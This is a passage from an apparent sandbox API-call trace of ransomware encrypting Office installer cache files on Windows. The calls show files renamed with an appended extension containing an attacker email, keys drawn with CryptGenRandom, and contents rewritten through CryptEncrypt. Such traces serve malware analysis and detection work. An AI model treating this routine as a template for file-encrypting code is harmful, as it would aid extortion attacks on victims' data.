Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" [0140.919] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0140.922] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x490 [0140.922] GetProcessHeap () returned 0x2e0000 [0140.922] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a7410 | out: hHeap=0x2e0000) returned 1 [0140.922] GetFileSizeEx (in: hFile=0x490, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=1988) returned 1 [0140.922] SetFilePointer (in: hFile=0x490, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x7c4 [0140.922] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0140.922] GetProcessHeap () returned 0x2e0000 [0140.922] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0140.923] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0140.923] WriteFile (in: hFile=0x490, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0140.925] WriteFile (in: hFile=0x490, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0140.925] WriteFile (in: hFile=0x490, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0140.925] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x7c4) returned 0x3a7410 [0140.925] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x7c4) returned 0x3a7be0 [0140.925] SetFilePointer (in: hFile=0x490, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.926] ReadFile (in: hFile=0x490, lpBuffer=0x3a7410, nNumberOfBytesToRead=0x7c4, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3a7410*, lpNumberOfBytesRead=0x2acf9c8*=0x7c4, lpOverlapped=0x0) returned 1 [0140.926] SetFilePointer (in: hFile=0x490, lDistanceToMove=-1988, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.926] WriteFile (in: hFile=0x490, lpBuffer=0x3a7be0*, nNumberOfBytesToWrite=0x7c4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3a7be0*, lpNumberOfBytesWritten=0x2acf9c8*=0x7c4, lpOverlapped=0x0) returned 1 [0140.926] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a7410 | out: hHeap=0x2e0000) returned 1 [0140.926] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a7be0 | out: hHeap=0x2e0000) returned 1 [0140.926] CloseHandle (hObject=0x490) returned 1 [0140.926] GetProcessHeap () returned 0x2e0000 [0140.926] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0140.927] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0140.927] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0140.927] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3856c8 | out: hHeap=0x2e0000) returned 1 [0140.927] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385620 | out: hHeap=0x2e0000) returned 1 [0140.927] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x385620 [0140.927] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0140.927] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0140.927] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0140.927] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0140.927] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", dwFileAttributes=0x80) returned 1 [0140.928] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 75 [0140.928] GetProcessHeap () returned 0x2e0000 [0140.928] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xfc) returned 0x363a50 [0140.928] lstrcpyW (in: lpString1=0x363a50, lpString2="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab" [0140.928] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab.12781717671972518758.ex_parvis@aol.com.AIR" [0140.928] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0140.930] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x490 [0140.931] GetProcessHeap () returned 0x2e0000 [0140.931] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0140.931] GetFileSizeEx (in: hFile=0x490, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=17456632) returned 1 [0140.931] SetFilePointer (in: hFile=0x490, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x10a5df8 [0140.931] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0140.931] GetProcessHeap () returned 0x2e0000 [0140.931] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0140.931] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0140.931] WriteFile (in: hFile=0x490, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0140.933] WriteFile (in: hFile=0x490, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0140.933] WriteFile (in: hFile=0x490, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0140.933] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10a5df8) returned 0x30d0020 [0140.934] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10a5df8) returned 0x4180020 [0140.934] SetFilePointer (in: hFile=0x490, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.934] ReadFile (in: hFile=0x490, lpBuffer=0x30d0020, nNumberOfBytesToRead=0x10a5df8, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x10a5df8, lpOverlapped=0x0) returned 1 [0142.006] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0142.006] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0142.006] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", dwFileAttributes=0x80) returned 1 [0142.008] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 78 [0142.008] GetProcessHeap () returned 0x2e0000 [0142.008] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x102) returned 0x3a7410 [0142.008] lstrcpyW (in: lpString1=0x3a7410, lpString2="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" [0142.008] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR" [0142.008] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0142.012] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x490 [0142.012] GetProcessHeap () returned 0x2e0000 [0142.012] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a7410 | out: hHeap=0x2e0000) returned 1 [0142.012] GetFileSizeEx (in: hFile=0x490, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=1606) returned 1 [0142.012] SetFilePointer (in: hFile=0x490, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x646 [0142.012] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0142.012] GetProcessHeap () returned 0x2e0000 [0142.012] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0142.012] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0142.012] WriteFile (in: hFile=0x490, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0142.014] WriteFile (in: hFile=0x490, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0142.014] WriteFile (in: hFile=0x490, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0142.014] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x646) returned 0x3a7410 [0142.014] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x646) returned 0x3a7a60 [0142.014] SetFilePointer (in: hFile=0x490, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.014] ReadFile (in: hFile=0x490, lpBuffer=0x3a7410, nNumberOfBytesToRead=0x646, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3a7410*, lpNumberOfBytesRead=0x2acf9c8*=0x646, lpOverlapped=0x0) returned 1 [0142.014] SetFilePointer (in: hFile=0x490, lDistanceToMove=-1606, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.014] WriteFile (in: hFile=0x490, lpBuffer=0x3a7a60*, nNumberOfBytesToWrite=0x646, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3a7a60*, lpNumberOfBytesWritten=0x2acf9c8*=0x646, lpOverlapped=0x0) returned 1 [0142.014] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a7410 | out: hHeap=0x2e0000) returned 1 [0142.014] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a7a60 | out: hHeap=0x2e0000) returned 1 [0142.014] CloseHandle (hObject=0x490) returned 1 [0142.015] GetProcessHeap () returned 0x2e0000 [0142.015] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0142.015] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0142.015] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0142.015] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385578 | out: hHeap=0x2e0000) returned 1 [0142.015] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3854d0 | out: hHeap=0x2e0000) returned 1 [0142.015] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x3854d0 [0142.015] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0142.015] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0142.015] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0142.015] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0142.015] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi", dwFileAttributes=0x80) returned 1 [0142.016] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 78 [0142.016] GetProcessHeap () returned 0x2e0000 [0142.016] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x102) returned 0x3a7410 [0142.016] lstrcpyW (in: lpString1=0x3a7410, lpString2="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi" [0142.016] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR" [0142.016] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.msi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0142.019] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.msi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x490 [0142.019] GetProcessHeap () returned 0x2e0000 [0142.019] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a7410 | out: hHeap=0x2e0000) returned 1 [0142.019] GetFileSizeEx (in: hFile=0x490, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=2503680) returned 1 [0142.019] SetFilePointer (in: hFile=0x490, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x263400 [0142.019] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0142.019] GetProcessHeap () returned 0x2e0000 [0142.019] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0142.019] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0142.019] WriteFile (in: hFile=0x490, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0142.021] WriteFile (in: hFile=0x490, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0142.021] WriteFile (in: hFile=0x490, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0142.021] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x263400) returned 0x30d0020 [0142.021] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x263400) returned 0x3340020 [0142.022] SetFilePointer (in: hFile=0x490, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.022] ReadFile (in: hFile=0x490, lpBuffer=0x30d0020, nNumberOfBytesToRead=0x263400, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x263400, lpOverlapped=0x0) returned 1 [0142.152] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5b30b20, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0x9721ce70, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x9721ce70, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x35e098 [0142.153] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0142.153] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0142.153] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328f90 [0142.153] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0142.153] GetLastError () returned 0x0 [0142.153] FindNextFileW (in: hFindFile=0x35e098, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5b30b20, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0x9721ce70, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x9721ce70, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0142.153] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0142.153] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0142.153] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328f90 [0142.153] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0142.153] GetLastError () returned 0x0 [0142.153] FindNextFileW (in: hFindFile=0x35e098, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x308ae9f0, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0x308ae9f0, ftLastAccessTime.dwHighDateTime=0x1cbe56c, ftLastWriteTime.dwLowDateTime=0xa5b55ce0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x265400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProjectMUI.msi", cAlternateFileName="PROJEC~1.MSI")) returned 1 [0142.153] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0142.153] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0142.153] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328f90 [0142.153] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0142.153] GetLastError () returned 0x0 [0142.153] FindNextFileW (in: hFindFile=0x35e098, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x30a2b7b0, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0x30a2b7b0, ftLastAccessTime.dwHighDateTime=0x1cbe56c, ftLastWriteTime.dwLowDateTime=0xa5b2ebe0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x5ac, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProjectMUI.xml", cAlternateFileName="PROJEC~1.XML")) returned 1 [0142.154] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0142.154] 